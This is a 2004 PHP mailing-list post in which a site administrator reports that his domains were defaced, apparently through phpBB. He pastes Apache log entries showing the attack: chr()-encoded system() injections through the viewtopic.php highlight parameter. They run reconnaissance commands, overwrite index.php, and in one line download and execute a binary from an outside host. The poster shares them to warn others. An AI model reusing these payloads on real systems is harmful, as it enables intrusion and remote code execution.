PHP Exploit via phpBB?

John Nichel <john@xxxxxxxxxxxx> · Wed, 22 Dec 2004 14:38:54 -0500

I haven't fully researched it yet, but our domains were just hacked, and 
from the looks of it, the attack came in thru phpBB.  This morning, 
around 9:00am, I upgraded our webserver to php v4.3.10 from v4.3.9 due 
to potential security risks, and at 11:30 it looks as if the attack 
started.  By 11:48, all of the php pages, on all of our domains were 
replaced by one like this...

http://john.nichel.net

I don't know if this is a PHP problem or a phpBB problem as of yet, but 
I wanted to get the word out here so that y'all can take precautions if 
neccessary.  I disabled the system() function on our box, and may need 
to take further action as I discover more.

Below is what I believe to be the 'offensive' access from the Apache 
logs on the domain where the attack started.  If you see something that 
I'm missing, please let the list know.

201.9.192.212   -       -       [22/Dec/2004:11:30:43 -0500]    GET 
/temp_forums/viewtopic.php?t=111&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 
HTTP/1.1       200     101693  -       Mozilla/3.0 (compatible; Indy 
Library)

201.9.192.212   -       -       [22/Dec/2004:11:34:41 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1      200     91134   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:34:59 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(112)%252echr(114)%252echr(111)%252echr(99)%252echr(47)%252echr(99)%252echr(112)%252echr(117)%252echr(105)%252echr(110)%252echr(102)%252echr(111)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1    200     110263  -      Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:35:43 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(108)%252echr(111)%252echr(99)%252echr(97)%252echr(108)%252echr(47)%252echr(97)%252echr(112)%252echr(97)%252echr(99)%252echr(104)%252echr(101)%252echr(47)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(47)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(100)%252echr(46)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1 200     80061  -Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:35:50 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(108)%252echr(111)%252echr(99)%252echr(97)%252echr(108)%252echr(47)%252echr(97)%252echr(112)%252echr(97)%252echr(99)%252echr(104)%252echr(101)%252echr(47)%252echr(59)%252echr(108)%252echr(115)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1  200    103205   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:36:06 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(104)%252echr(104)%252echr(32)%252echr(62)%252echr(32)%252echr(104)%252echr(97)%252echr(99)%252echr(46)%252echr(104)%252echr(114)%252echr(109)%252echr(108)%252echr(59)%252echr(108)%252echr(115)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1  200     103578  -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:36:34 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(72)%252echr(52)%252echr(99)%252echr(107)%252echr(51)%252echr(114)%252echr(83)%252echr(66)%252echr(82)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(32)%252echr(121)%252echr(111)%252echr(117)%252echr(114)%252echr(32)%252echr(98)%252echr(121)%252echr(32)%252echr(120)%252echr(100)%252echr(114)%252echr(48)%252echr(112)%252echr(52)%252echr(53)%252echr(53)%252echr(32)%252echr(62)%252echr(32)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%2

52echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1        200     80966   -       Mozilla/3.0 (compatible; Indy 
Library)

201.9.192.212   -       -       [22/Dec/2004:11:36:36 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1   200     80793   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:36:41 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1   200     80793   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:37:03 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1   200     80793   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:37:25 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(109)%252echr(118)%252echr(32)%252echr(45)%252echr(102)%252echr(32)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(32)%252echr(47)%252echr(119)%252echr(101)%252echr(98)%252echr(115)%252echr(101)%252echr(114)%252echr(118)%252echr(101)%252echr(114)%252echr(47)%252echr(118)%252echr(104)%252echr(111)%252echr(115)%252echr(116)%252echr(115)%252echr(47)%252echr(98)%252echr(121)%252echr(45)%252echr(116)%252echr(111)%252echr(114)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(111)%252echr(99)%252echr(115)%252echr(47)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252

echr(112)%252echr(104)%252echr(112)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1    200     81926   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:11:41:53 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(105)%252echr(110)%252echr(116)%252echr(114)%252echr(97)%252echr(110)%252echr(111)%252echr(114)%252echr(116)%252echr(104)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(46)%252echr(98)%252echr(114)%252echr(47)%252echr(120)%252echr(112)%252echr(108)%252echr(47)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252ec

hr(100)%252echr(32)%252echr(55)%252echr(55)%252echr(55)%252echr(32)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(46)%252echr(47)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1        200    83277    -       Mozilla/3.0 (compatible; Indy 
Library)

201.9.192.212   -       -       [22/Dec/2004:11:44:29 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 
HTTP/1.1   200     80793   -       Mozilla/3.0 (compatible; Indy Library)

201.9.192.212   -       -       [22/Dec/2004:12:09:49 -0500]    GET 
/temp_forums//viewtopic.php?t=111&highlight=%2527%252e HTTP/1.1 
200     101230  -       Mozilla/3.0 (compatible; Indy Library)

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
john@xxxxxxxxxxxx

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php